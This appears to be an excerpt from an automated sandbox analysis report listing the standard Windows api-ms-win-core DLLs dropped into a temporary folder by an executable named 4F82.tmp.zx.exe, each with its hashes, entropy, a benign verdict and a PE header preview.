                                                                                                                                                                                                                      SHA-512:BD6CF4E37C3E7A1A3B36F42858AF1B476F69CAA4BA1FD836A7E32220E5EFF7CCC811C903019560844AF988A7C77CC41DC6216C0C949D8E04516A537DA5821A3E
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...".NV.........." .........................................................0...........`.........................................`...L............ ...................A..............8............................................................................rdata..\...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-file-l2-1-0.dll

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):19736
                                                                                                                                                                                                                      Entropy (8bit):7.113839950805383
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:IVxWEhWnqEQpBj0HRN7HQHRN7YAXAXOVlTS:IVh6HqWH8lAH
                                                                                                                                                                                                                      MD5:7D4D4593B478B4357446C106B64E61F8
                                                                                                                                                                                                                      SHA1:8A4969C9E59D7A7485C8CC5723C037B20DEA5C9D
                                                                                                                                                                                                                      SHA-256:0A6E2224CDE90A0D41926E8863F9956848FFBF19848E8855BD08953112AFC801
                                                                                                                                                                                                                      SHA-512:7BC9C473705EC98BA0C1DA31C295937D97710CEDEFC660F6A5CB0512BAE36AD23BEBB2F6F14DF7CE7F90EC3F817B02F577317FDD514560AAB22CB0434D8E4E0B
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...).NV.........." .........................................................0............`.........................................`................ ...................A..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-handle-l1-1-0.dll

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):19736
                                                                                                                                                                                                                      Entropy (8bit):7.052601866399419
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:XWEhW2lQpBj0HRN7NkhXQHRN7vnR1lp1x09lgerA:37qWw8vRnpss
                                                                                                                                                                                                                      MD5:7BC1B8712E266DB746914DB48B27EF9C
                                                                                                                                                                                                                      SHA1:C76EB162C23865B3F1BD7978F7979D6BA09CCB60
                                                                                                                                                                                                                      SHA-256:F82D05AEA21BCF6337EF45FBDAD6D647D17C043A67B44C7234F149F861A012B9
                                                                                                                                                                                                                      SHA-512:DB6983F5F9C18908266DBF01EF95EBAE49F88EDC04A0515699EF12201AC9A50F09939B8784C75AE513105ADA5B155E5330BD42D70F8C8C48FE6005513AEFAD2A
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...".NV.........." .........................................................0.......r....`.........................................`..._............ ...................A..............8............................................................................rdata..t...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-heap-l1-1-0.dll

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):20248
                                                                                                                                                                                                                      Entropy (8bit):7.028564065154355
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:nZlrPWEhWcrIAjW65FdQpBjSdHnhWgN7a8WcA+0W65FdQHnhWgN7a8W1P5mzVEMW:ZlzWEhWKFQpBj0HRN7JGQHRN7rCMllq
                                                                                                                                                                                                                      MD5:B071E761CEA670D89D7AE80E016CE7E6
                                                                                                                                                                                                                      SHA1:C675BE753DBEF1624100F16674C2221A20CF07DD
                                                                                                                                                                                                                      SHA-256:63FB84A49308B857804AE1481D2D53B00A88BBD806D257D196DE2BD5C385701E
                                                                                                                                                                                                                      SHA-512:F2ECBDABA3516D92BD29DCCE618185F1755451D95C7DBBE23F8215318F6F300A9964C93EC3ED65C5535D87BE82B668E1D3025A7E325AF71A05F14E15D530D35F
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...".NV.........." .........................................................0............`.........................................`................ ...................A..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-interlocked-l1-1-0.dll

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):19736
                                                                                                                                                                                                                      Entropy (8bit):7.064651561006373
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:DPWEhWcAQIqyW65FdQpBjSdHnhWgN7a8WcnKW65FdQHnhWgN7a8WwFoodqnajqxB:LWEhWFqEQpBj0HRN7XsQHRN7XSIlex7N
                                                                                                                                                                                                                      MD5:1DCCF27F2967601CE6666C8611317F03
                                                                                                                                                                                                                      SHA1:D8246DF2ED9EC4A8A719FD4B1DB4FD8A71EF679B
                                                                                                                                                                                                                      SHA-256:6A83AB9A413AFD74D77A090F52784B0128527BEE9CB0A4224C59D5C75FC18387
                                                                                                                                                                                                                      SHA-512:70B96D69D609211F8B9E05FA510EA7D574AE8DA3A6498F5C982AEE71635B8A749162247055B7BA21A884BFA06C1415B68912C463F0F1B6FFB9049F3532386877
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0...........`.........................................`................ ...................A..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-libraryloader-l1-1-0.dll

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):20248
                                                                                                                                                                                                                      Entropy (8bit):7.078698929399523
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:GvuBL3BXWEhWfnhLvQpBj0HRN7YQ3QHRN7Tp1x09lgek/:xBL3B3shLvqWYQ38Tps6
                                                                                                                                                                                                                      MD5:569A7AC3F6824A04282FF708C629A6D2
                                                                                                                                                                                                                      SHA1:FC0D78DE1075DFD4C1024A72074D09576D4D4181
                                                                                                                                                                                                                      SHA-256:84C579A8263A87991CA1D3AEE2845E1C262FB4B849606358062093D08AFDC7A2
                                                                                                                                                                                                                      SHA-512:E9CBFF82E32540F9230CEAD9063ACB1ACEB7CCC9F3338C0B7AD10B0AC70FF5B47C15944D0DCE33EA8405554AA9B75DE30B26AE2CA55DB159D45B6E64BC02A180
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...".NV.........." .........................................................0......Gg....`.........................................`................ ...................A..............8............................................................................rdata..(...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-localization-l1-2-0.dll

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):22296
                                                                                                                                                                                                                      Entropy (8bit):7.054401722955359
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:WOMw3zdp3bwjGjue9/0jCRrndbkWEhWE6yQpBj0HRN7LFQHRN7l8pUclXr:WOMwBprwjGjue9/0jCRrndby/qWLF8l4
                                                                                                                                                                                                                      MD5:1D75E7B9F68C23A195D408CF02248119
                                                                                                                                                                                                                      SHA1:62179FC9A949D238BB221D7C2F71BA7C1680184C
                                                                                                                                                                                                                      SHA-256:67EBE168B7019627D68064043680674F9782FDA7E30258748B29412C2B3D4C6B
                                                                                                                                                                                                                      SHA-512:C2EE84A9AEAC34F7B51426D12F87BB35D8C3238BB26A6E14F412EA485E5BD3B8FB5B1231323D4B089CF69D8180A38DDD7FD593CC52CBDF250125AD02D66EEA9D
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0......U.....`.........................................`................ ...................A..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-memory-l1-1-0.dll

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):20248
                                                                                                                                                                                                                      Entropy (8bit):7.0496932942785735
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:/qWEhW8nhLvQpBj0HRN78riQHRN7TaSIlexO:ADhLvqWR8W6s
                                                                                                                                                                                                                      MD5:623283471B12F1BDB83E25DBAFAF9C16
                                                                                                                                                                                                                      SHA1:ECBBA66F4DCA89A3FAA3E242E30AEFAC8DE02153
                                                                                                                                                                                                                      SHA-256:9CA500775FEE9FF69B960D65040B8DC415A2EFDE2982A9251EE6A3E8DE625BC7
                                                                                                                                                                                                                      SHA-512:54B69FFA2C263BE4DDADCA62FA2867FEA6148949D64C2634745DB3DCBC1BA0ECF7167F02FA53EFD69EAAEE81D617D914F370F26CA16EE5850853F70C69E9A61F
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0............`.........................................`...l............ ...................A..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-namedpipe-l1-1-0.dll

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):19736
                                                                                                                                                                                                                      Entropy (8bit):7.110045595478065
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:nWEhWC5oQpBj0HRN7EODQHRN7nvp1x09lgefv:nNaqWEo8nvpsH
                                                                                                                                                                                                                      MD5:61F70F2D1E3F22E976053DF5F3D8ECB7
                                                                                                                                                                                                                      SHA1:7D224B7F404CDE960E6B7A1C449B41050C8E9C58
                                                                                                                                                                                                                      SHA-256:2695761B010D22FDFDA2B5E73CF0AC7328CCC62B4B28101D5C10155DD9A48020
                                                                                                                                                                                                                      SHA-512:1DDC568590E9954DB198F102BE99EABB4133B49E9F3B464F2FC7F31CC77D06D5A7132152F4B331332C42F241562EE6C7BF1C2D68E546DB3F59AB47EAF83A22CF
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...".NV.........." .........................................................0......S.....`.........................................`................ ...................A..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-processenvironment-l1-1-0.dll

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):20760
                                                                                                                                                                                                                      Entropy (8bit):7.026463196608447
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:UWWEhWsxlQpBj0HRN7l1khQHRN7kTPSIlexA:1DqWl1kh8kL62
                                                                                                                                                                                                                      MD5:1322690996CF4B2B7275A7950BAD9856
                                                                                                                                                                                                                      SHA1:502E05ED81E3629EA3ED26EE84A4E7C07F663735
                                                                                                                                                                                                                      SHA-256:5660030EE4C18B1610FB9F46E66F44D3FC1CF714ECCE235525F08F627B3738D7
                                                                                                                                                                                                                      SHA-512:7EDC06BFA9E633351291B449B283659E5DD9E706DD57ADE354BCE3AF55DF4842491AF27C7721B2ACC6948078BDFC8E9736FEC46E0641AF368D419C7ED6AEBD44
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...".NV.........." .........................................................0......G.....`.........................................`...G............ ...................A..............8............................................................................rdata..h...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-processthreads-l1-1-0.dll

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):21784
                                                                                                                                                                                                                      Entropy (8bit):7.053725357941814
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:5WXk1JzNcKSImWEhW1qEQpBj0HRN77S4QHRN7j8AXOVlTHxE:5bcKSdkHqW+48j/cE
                                                                                                                                                                                                                      MD5:95612A8A419C61480B670D6767E72D09
                                                                                                                                                                                                                      SHA1:3B94D1745AFF6AAFEFF87FED7F23E45473F9AFC9
                                                                                                                                                                                                                      SHA-256:6781071119D66757EFA996317167904697216AD72D7C031AF4337138A61258D4
                                                                                                                                                                                                                      SHA-512:570F15C2C5AA599332DD4CFB3C90DA0DD565CA9053ECF1C2C05316A7F623615DD153497E93B38DF94971C8ABF2E25BC1AAAF3311F1CDA432F2670B32C767012A
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0............`.........................................`................ ...................A..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-processthreads-l1-1-1.dll

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):20248
                                                                                                                                                                                                                      Entropy (8bit):7.060875826104053
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:iDfIeAWEhWY6yQpBj0HRN7wHQHRN7NjZSIlexL:NemTqWC8NV6d
                                                                                                                                                                                                                      MD5:D6AD0F2652460F428C0E8FC40B6F6115
                                                                                                                                                                                                                      SHA1:1A5152871ABC5CF3D4868A218DE665105563775E
                                                                                                                                                                                                                      SHA-256:4EF09FA6510EEEBB4855B6F197B20A7A27B56368C63CC8A3D1014FA4231AB93A
                                                                                                                                                                                                                      SHA-512:CEAFEEE932919BC002B111D6D67B7C249C85D30DA35DFBCEBD1F37DB51E506AC161E4EE047FF8F7BF0D08DA6A7F8B97E802224920BD058F8E790E6FA0EE48B22
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0......@!....`.........................................`................ ...................A..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-profile-l1-1-0.dll

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):19224
                                                                                                                                                                                                                      Entropy (8bit):7.1376464003004685
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:tnjFPWEhWcCTQW65FdQpBjSdHnhWgN7a8Wc//W65FdQHnhWgN7a8WOR5mzVEMqnL:tnhWEhWnqQpBj0HRN7hQHRN7mCMll5i
                                                                                                                                                                                                                      MD5:654D95515AB099639F2739685CB35977
                                                                                                                                                                                                                      SHA1:9951854A5CF407051CE6CD44767BFD9BD5C4B0CC
                                                                                                                                                                                                                      SHA-256:C4868E4CEBDF86126377A45BD829D88449B4AA031C9B1C05EDC47D6D395949D4
                                                                                                                                                                                                                      SHA-512:9C9DD64A3AD1136BA62CCA14FC27574FAAEBC3DE1E371A86B83599260424A966DFD813991A5EF0B2342E0401CB99CE83CD82C19FCAE73C7DECDB92BAC1FB58A8
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...".NV.........." .........................................................0......N.....`.........................................`................ ...................A..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-rtlsupport-l1-1-0.dll

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):20248
                                                                                                                                                                                                                      Entropy (8bit):7.038577027863076
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:QGeVdWEhWF4+QpBj0HRN7nKQHRN7KFcR8pUclXi:QGeVFp+qWK8AG8pUh
                                                                                                                                                                                                                      MD5:E6B7681CCC718DDB69C48ABE8709FDD6
                                                                                                                                                                                                                      SHA1:A518B705746B2C6276F56A2F1C996360B837D548
                                                                                                                                                                                                                      SHA-256:4B532729988224FE5D98056CD94FC3E8B4BA496519F461EF5D9D0FF9D9402D4B
                                                                                                                                                                                                                      SHA-512:89B20AFFAA23E674543F0F2E9B0A8B3ECD9A8A095E19D50E11C52CB205DAFDBF2672892FD35B1C45F16E78AE9B61525DE67DBE7673F8CA450AA8C42FEEAC0895
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0.......2....`.........................................`................ ...................A..............8............................................................................rdata..,...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-string-l1-1-0.dll

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):19736
                                                                                                                                                                                                                      Entropy (8bit):7.087741938037833
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:nyMvfWEhWtJ7QpBj0HRN7n0QHRN7gTtAXOVlTF2:nyMvPq7qWn08gWd
                                                                                                                                                                                                                      MD5:BCB412464F01467F1066E94085957F42
                                                                                                                                                                                                                      SHA1:716C11B5D759D59DBFEC116874E382D69F9A25B6
                                                                                                                                                                                                                      SHA-256:F040B6E07935B67599EA7E32859A3E93DB37FF4195B28B4451AD0D274DB6330E
                                                                                                                                                                                                                      SHA-512:79EC0C5EE21680843C8B7F22DA3155B7607D5BE269F8A51056CC5F060AD3A48CED3B6829117262ABA1A90E692374B59DDFE92105D14179F631EFC0C863BFDECB
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...".NV.........." .........................................................0......#j....`.........................................`................ ...................A..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-synch-l1-1-0.dll

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):21784
                                                                                                                                                                                                                      Entropy (8bit):7.005386895286503
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:Ddv3V0dfpkXc0vVaEWEhWYYxnhLvQpBj0HRN7gPZGQHRN7xuHNiWXhlhOY3:Ddv3VqpkXc0vVaS5ahLvqWSA8sNizM
                                                                                                                                                                                                                      MD5:B98598657162DE8FBC1536568F1E5A4F
                                                                                                                                                                                                                      SHA1:F7C020220025101638FD690D86C53D895A03E53C
                                                                                                                                                                                                                      SHA-256:F596C72BE43DB3A722B7C7A0FD3A4D5AEA68267003986FBFD278702AF88EFA74
                                                                                                                                                                                                                      SHA-512:AD5F46A3F4F6E64A5DCB85C328F1B8DAEFA94FC33F59922328FDCFEDC04A8759F16A1A839027F74B7D7016406C20AC47569277620D6B909E09999021B669A0D6
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0............`.........................................`...V............ ...................A..............8............................................................................rdata..l...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-synch-l1-2-0.dll

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):20248
                                                                                                                                                                                                                      Entropy (8bit):7.091480115020503
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:ntZ3lWEhWFJ7QpBj0HRN7DdC8QHRN7cSIlexF:pa7qWDdC88c6H
                                                                                                                                                                                                                      MD5:B751571148923D943F828A1DEB459E24
                                                                                                                                                                                                                      SHA1:D4160404C2AA6AEAF3492738F5A6CE476A0584A6
                                                                                                                                                                                                                      SHA-256:B394B1142D060322048FB6A8AC6281E4576C0E37BE8DA772BC970F352DD22A20
                                                                                                                                                                                                                      SHA-512:26E252FF0C01E1E398EBDDCC5683A58CDD139161F2B63B65BDE6C3E943E85C0820B24486859C2C597AF6189DE38CA7FE6FA700975BE0650CB53C791CD2481C9D
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...".NV.........." .........................................................0......?.....`.........................................`...v............ ...................A..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-sysinfo-l1-1-0.dll

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):20760
                                                                                                                                                                                                                      Entropy (8bit):7.031246620579023
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:rB2WEhWC5oQpBj0HRN7xQHRN7sbSIlexe:rBs1aqWx8868
                                                                                                                                                                                                                      MD5:8AEA681E0E2B9ABBF73A924003247DBB
                                                                                                                                                                                                                      SHA1:5BAFC2E0A3906723F9B12834B054E6F44D7FF49F
